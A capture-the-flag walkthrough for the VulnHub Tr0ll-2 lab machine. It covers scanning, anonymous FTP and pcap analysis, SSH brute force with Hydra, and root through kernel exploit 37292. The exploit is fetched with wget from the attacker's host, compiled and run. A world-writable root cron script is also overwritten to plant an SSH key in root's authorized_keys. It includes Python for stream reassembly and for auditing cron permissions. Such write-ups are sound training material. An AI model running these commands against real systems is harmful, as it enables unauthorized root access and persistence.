VulnHub Box 4: Tr0ll-2

Information Gathering

Attacker (Kali): 192.168.182.128

Host Discovery

nmap -sP 192.168.182.0/24

(-sP is the old name for -sn: a ping sweep that lists live hosts without port-scanning them.)

Target IP: 192.168.182.129

Port Scan

nmap -sS -sV -A -T4 -p- 192.168.182.129

Open ports: 21, 22 and 80. The relevant part of the scan output:

21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap [NSE: writeable]
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret

FTP allows anonymous login, and robots.txt on port 80 discloses a /secret directory.

Exploitation

Anonymous FTP Login

Log in with the anonymous account.

The listing shows lol.pcap, the file nmap's ftp-anon script already reported. Download it.

Open the downloaded pcap (Wireshark works well for this). The capture is a file transfer.

Following the TCP stream reveals a file named secret_stuff.txt with the following contents:

Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P

Sucks, you were so close... gotta TRY HARDER!
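Following the stream in Wireshark is the quick way; to show what that operation does underneath, here is an added example that is not part of the original write-up: a small Python parser that reads a classic libpcap file, groups TCP segments per direction and reassembles their payloads by sequence number, tolerating out-of-order and retransmitted segments. The capture is constructed inline; the addresses, the client ports, the use of server port 20 (an active-mode FTP data connection) and the split of the message into two segments are assumptions, and only the message text itself is taken from the page.

```python
import socket
import struct

# Message recovered from the capture on the page; the split into two segments is ours.
SECRET_TEXT = (b"Well, well, well, aren't you just a clever little devil, "
               b"you almost found the sup3rs3cr3tdirlol :-P\r\n\r\n"
               b"Sucks, you were so close... gotta TRY HARDER!\r\n")


def build_frame(src, sport, dst, dport, seq, payload, flags=0x18):
    """Ethernet/IPv4/TCP frame; checksums stay zero because the parser ignores them."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, flags, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp + payload


def build_pcap(frames):
    """Classic libpcap container (little-endian magic, linktype 1 = Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1407600000 + i, 0, len(frame), len(frame)) + frame
    return out


# Constructed sample (assumed addresses/ports): an FTP banner on port 21, then the data
# connection from server port 20 delivering the file out of order and with one retransmit.
SERVER, CLIENT = "192.168.182.129", "192.168.182.128"
PART1, PART2 = SECRET_TEXT[:60], SECRET_TEXT[60:]
SAMPLE_PCAP = build_pcap([
    build_frame(SERVER, 21, CLIENT, 51234, 1000, b"220 (vsFTPd 3.0.2)\r\n"),
    build_frame(SERVER, 20, CLIENT, 40123, 1 + len(PART1), PART2),  # second half arrives first
    build_frame(SERVER, 20, CLIENT, 40123, 1, PART1),
    build_frame(SERVER, 20, CLIENT, 40123, 1, PART1),                # retransmission
])


def pcap_frames(data):
    """Yield raw link-layer frames from a classic libpcap file (not pcapng)."""
    magic = struct.unpack_from("<I", data, 0)[0]
    if magic == 0xA1B2C3D4:
        end = "<"
    elif magic == 0xD4C3B2A1:
        end = ">"
    else:
        raise ValueError("not a classic libpcap file; Wireshark saves pcapng by default")
    if struct.unpack_from(end + "I", data, 20)[0] != 1:
        raise ValueError("only Ethernet captures are handled")
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack_from(end + "IIII", data, off)[2]
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def tcp_segment(frame):
    """Return (src, sport, dst, dport, seq, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
        return None
    ihl = (frame[14] & 0x0F) * 4
    total_len = struct.unpack_from("!H", frame, 16)[0]
    src, dst = socket.inet_ntoa(frame[26:30]), socket.inet_ntoa(frame[30:34])
    tcp_off = 14 + ihl
    sport, dport, seq = struct.unpack_from("!HHI", frame, tcp_off)
    data_off = (frame[tcp_off + 12] >> 4) * 4
    return src, sport, dst, dport, seq, frame[tcp_off + data_off:14 + total_len]


def follow_streams(data):
    """Reassemble each unidirectional TCP flow's payload, keyed by (src, sport, dst, dport)."""
    chunks = {}
    for frame in pcap_frames(data):
        seg = tcp_segment(frame)
        if seg and seg[5]:
            # First copy of a sequence number wins; later copies are retransmissions.
            chunks.setdefault(seg[:4], {}).setdefault(seg[4], seg[5])
    streams = {}
    for key, by_seq in chunks.items():
        buf, expected = b"", None
        for seq in sorted(by_seq):
            payload = by_seq[seq]
            if expected is not None and seq < expected:
                payload = payload[expected - seq:]  # overlapping bytes were already emitted
            buf += payload  # a gap (seq > expected) is simply concatenated over
            expected = max(expected or 0, seq + len(by_seq[seq]))
        streams[key] = buf
    return streams


def ftp_data_streams(data):
    """The flows an FTP server sends from port 20: the transferred files themselves."""
    return {k: v for k, v in follow_streams(data).items() if k[1] == 20}


if __name__ == "__main__":
    for key, content in ftp_data_streams(SAMPLE_PCAP).items():
        print(key, content.decode())
```

Two caveats for real captures: the FTP data port is only 20 in active mode (passive mode negotiates a high port in the PASV reply, so key on the control channel instead), and Wireshark saves pcapng by default, which this parser deliberately refuses; export as "Wireshark/tcpdump - pcap" or use lol.pcap as downloaded.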

Web Enumeration

robots.txt points to the /secret directory, which contains an image. Download it and check it for hidden data.

The image holds no steganographic content. Continue enumerating by browsing to the path disclosed in the pcap, /sup3rs3cr3tdirlol/.

It contains a file named roflmao. Download and inspect it; it contains the string: Find address 0x0856BF to proceed

Treat the address as a path and browse to /0x0856BF/. This leads to a list of usernames, which_one_lol.txt, and a password file, Pass.txt.

Brute-Forcing SSH

Use the username list and the password file against SSH:

hydra -L which_one_lol.txt -p Pass.txt 192.168.182.129 ssh

(-L reads the username list from which_one_lol.txt; lowercase -p passes the literal string Pass.txt as the password. That is the trick here: the password is the file's name, not any line inside it. A lowercase -l would have tried "which_one_lol.txt" as the username.)

Hydra reports a valid pair:

login: overflow   password: Pass.txt

Log in over SSH:

ssh overflow@192.168.182.129

The login succeeds. Checking our privileges shows an unprivileged user, so we need to escalate.

Privilege Escalation

First check the kernel version to see whether a kernel exploit applies:

Ubuntu 14.04.1, kernel 3.13

Spawn a proper tty:

python -c "import pty;pty.spawn('/bin/bash')"

Search the local exploit database on Kali:

searchsploit ubuntu 14.04

Entry 37292 (the overlayfs local privilege escalation, CVE-2015-1328, which covers kernels 3.13.0 through 3.19 on Ubuntu 12.04/14.04/14.10/15.04) fits this target. Copy it out and serve it over HTTP from Kali:

cp /usr/share/exploitdb/exploits/linux/local/37292.c ./
ls
python3 -m http.server 8000

On the target, fetch, compile and run it (the exploit also compiles a helper shared object at runtime, so gcc must be present on the box, as it is here):

python -c "import pty;pty.spawn('/bin/bash')"
cd /tmp
wget http://192.168.182.128:8000/37292.c
ls
gcc 37292.c -o vvv
./vvv
whoami

If it succeeds, whoami reports root. Note that the box periodically kills the SSH session, so you may have to reconnect and run the exploit again.

Alternative Approach

The automatic SSH disconnects suggest a scheduled task is at work. Check the log:

cat /var/log/cronlog

The log references a cleaner.py. Inspect it:

cd /lib/log
cat /lib/log/cleaner.py

The cron job runs as root, and cleaner.py is mode 777, i.e. writable by any user. Whatever we put in that file runs as root on the next scheduled run, which gives us privilege escalation.
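A root cron job whose script an unprivileged user can modify is the general condition being exploited here. As an added example (not from the original write-up), the following Python checks /etc/crontab-format entries for that condition: it flags any absolute path in a root-run command whose file is world-writable, or whose directory is world-writable without the sticky bit so the file can simply be replaced. The crontab text and the file modes are constructed in a temporary directory for the demo; the names cleaner.py and rotate.py there are assumptions and the box's real /lib/log/cleaner.py is not touched.

```python
import os
import shutil
import stat
import tempfile


def parse_system_crontab(text):
    """Yield (user, command) from /etc/crontab or /etc/cron.d entries.

    Entries have five schedule fields (or one @macro such as @reboot), then the
    user the command runs as, then the command; blank lines, comments and
    VAR=value assignments are skipped.
    """
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split(None, 1)[0]:
            continue
        n_sched = 1 if line.startswith("@") else 5
        fields = line.split(None, n_sched + 1)
        if len(fields) < n_sched + 2:
            continue
        yield fields[n_sched], fields[n_sched + 1]


def world_writable(path):
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def find_writable_root_cron_targets(crontab_text):
    """Return (path, reason) for every absolute path in a root-run cron command that
    an unprivileged user could alter: the file itself is world-writable, or its
    directory is world-writable and not sticky, so the file can be replaced."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for token in command.split():
            if not token.startswith("/") or not os.path.isfile(token):
                continue
            if world_writable(token):
                findings.append((token, "file is world-writable"))
                continue
            parent_mode = os.stat(os.path.dirname(token)).st_mode
            if parent_mode & stat.S_IWOTH and not parent_mode & stat.S_ISVTX:
                findings.append((token, "directory is world-writable and not sticky"))
    return findings


def demo():
    """Constructed scenario: a root cron job running a 777 script next to a 755 one."""
    workdir = tempfile.mkdtemp()
    try:
        cleaner = os.path.join(workdir, "cleaner.py")  # assumed name, mirrors the page
        safe = os.path.join(workdir, "rotate.py")      # assumed name, the harmless control
        for path in (cleaner, safe):
            with open(path, "w") as fh:
                fh.write("#!/usr/bin/env python\n")
        os.chmod(cleaner, 0o777)   # the condition exploited on the page
        os.chmod(safe, 0o755)
        os.chmod(workdir, 0o755)   # mkdtemp gives 700; make the directory ordinary
        crontab = (
            "SHELL=/bin/sh\n"
            "# m h dom mon dow user command\n"
            "*/2 * * * * root python %s\n"
            "@daily      root python %s\n"
            "*/5 * * * * overflow python %s\n" % (cleaner, safe, cleaner)
        )
        return [(os.path.basename(p), r) for p, r in find_writable_root_cron_targets(crontab)]
    finally:
        shutil.rmtree(workdir)


if __name__ == "__main__":
    print(demo())
```

Run against a live system by feeding it the contents of /etc/crontab and each file under /etc/cron.d; the same check is what a hardening review should apply to everything root runs on a schedule, and the fix for the box's case is a root-owned script with mode 755 or stricter.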

Escalation Method

Generate an SSH key pair with ssh-keygen on Kali, then display the public key file so its contents can be pasted into the cron script.

Overwrite the cron script so that it installs the public key for root. The try/except needs Python's indentation, which the original listing lost, and the .ssh directory must be created with an absolute path and mode 700: sshd's default StrictModes refuses a group- or world-writable .ssh directory, so the original chmod 775 .ssh would only have worked by accident.

#!/usr/bin/env python
import os
import sys
try:
    os.system('mkdir -p /root/.ssh; chmod 700 /root/.ssh; echo "ssh-rsa <PUBLIC_KEY_BODY> root@Virtua1" >> /root/.ssh/authorized_keys; chmod 600 /root/.ssh/authorized_keys')
except:
    sys.exit()

Replace <PUBLIC_KEY_BODY> with the base64 part of your own public key. After the next scheduled run, log in as root with the matching private key: ssh -i <private key> root@192.168.182.129.